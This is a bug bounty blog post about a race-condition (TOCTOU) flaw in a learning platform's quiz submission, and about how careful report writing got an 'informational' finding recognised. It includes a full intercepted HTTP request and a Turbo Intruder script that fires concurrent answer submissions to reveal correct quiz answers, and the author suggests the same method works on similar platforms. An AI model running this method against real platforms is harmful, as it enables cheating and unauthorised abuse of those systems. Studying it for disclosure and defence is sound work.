the pen is mightier than the sword. (in bug hunting)
Hey folks, This is Captain_hook from BC. actually, I started my career about 1 and a half years ago, and I decided to share some things with ya all.
Why I chose this title?
I wanna start with the very basic Bug hunting stuff. some times you find a Bug that looks informational for you or the partner, for example, You can’t Exploit the vulnerability or the familiar sentence :
Men, this sentence is heartbreakingly sad.
But you can actually bypass this sentence. How? with a well-written report. for example, I recently find a broken flow while testing an LMS app functionality.
Business Logic Flaw Via race condition [ TOCTOU ]
this was the title of my report. So let’s break down this bug for you.
I found this Bug while trying to bypass Quiz flow.
With this Bug, An attacker can Find True answers to Questions without knowing it.
According to References, TOCTOU is :
The software checks the state of a resource before using that resource, but the resource’s state can change between the check and the use in a way that invalidates the results of the check. This can cause the software to perform invalid actions when the resource is in an unexpected state.
When The Vulnerability appears?
- As a manager Go to the APP and Create a test
quiz. - Click on the
add question. - After redirection to the quiz page, create your question. I suggest adding the
True/Falsequestion. - After adding your question, it’s time to add a Participant. So By adding participants, you assign the quiz to users.
- As a normal user, Click on the
takeexam and you will be redirected to the question area. - In the question area, Choose your answer ( I suggest choosing the wrong answer ), Hit and Intercept the Submit request with burp suite,
- Your request could be like ( adding
%sas a value ofgivenAnswer or similar parameter):
POST /quizz/questions?token=Some_token&index=0 HTTP/1.1
Host: canttellu.com
Connection: keep-alive
Content-Length: 39
sec-ch-ua: "Not;A Brand";v="9", "Google Chrome";v="91", "Chromium";v="91"
Accept: application/json, text/plain, */*
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Content-Type: application/json
Origin: https://canttellu.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,fa;q=0.8,de;q=0.7
Cookie: _ga=GA1.2.2045721624.1624951867; _gid=GA1.2.563691742.1625386984{"givenAnswer":[%s],"optionsOrder":null}
- Send this request from intercept to
Turbo intruder - In turbo intruder add this payload :
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=50,
requestsPerConnection=100,
pipeline=False
)for word in open('C:\\Users\\Captain Hook\\Desktop\\01.txt'):
engine.queue(target.req, word.rstrip())def handleResponse(req, interesting):
table.add(req)
- Replace your file path with mine, the content of
01.txtis the id that is assigned to answers, in my case it was :
0
1
0
1
...- after hitting the Attack button, I received this response ( you should receive something like this ):
As you can see the Race Condition worked! I except one 200 and 404 for all other requests. So as you can see I got 2 200 statuses ( both of 1 and 0 ).
- Check the responses of those two 200 statuses requests. and Compare to find the correct answer to the question.
So the Bug was it, and you can use this methodology in a similar LMS platform.
So let jump to the main idea of this article.
After reporting this issue, it was marked as informational and closed with P5 priority But the partner responds to me with this:
So actually the art of explanation worked for me, I wrote my report with exact details and received my kudos.
conclusion
- Use the goddam Markdown features in your writing.
- Break down the details and write a scenario of the attack for the customer.
- Also, you can use this methodology on similar platforms.
Thanks for your time 🐱👤
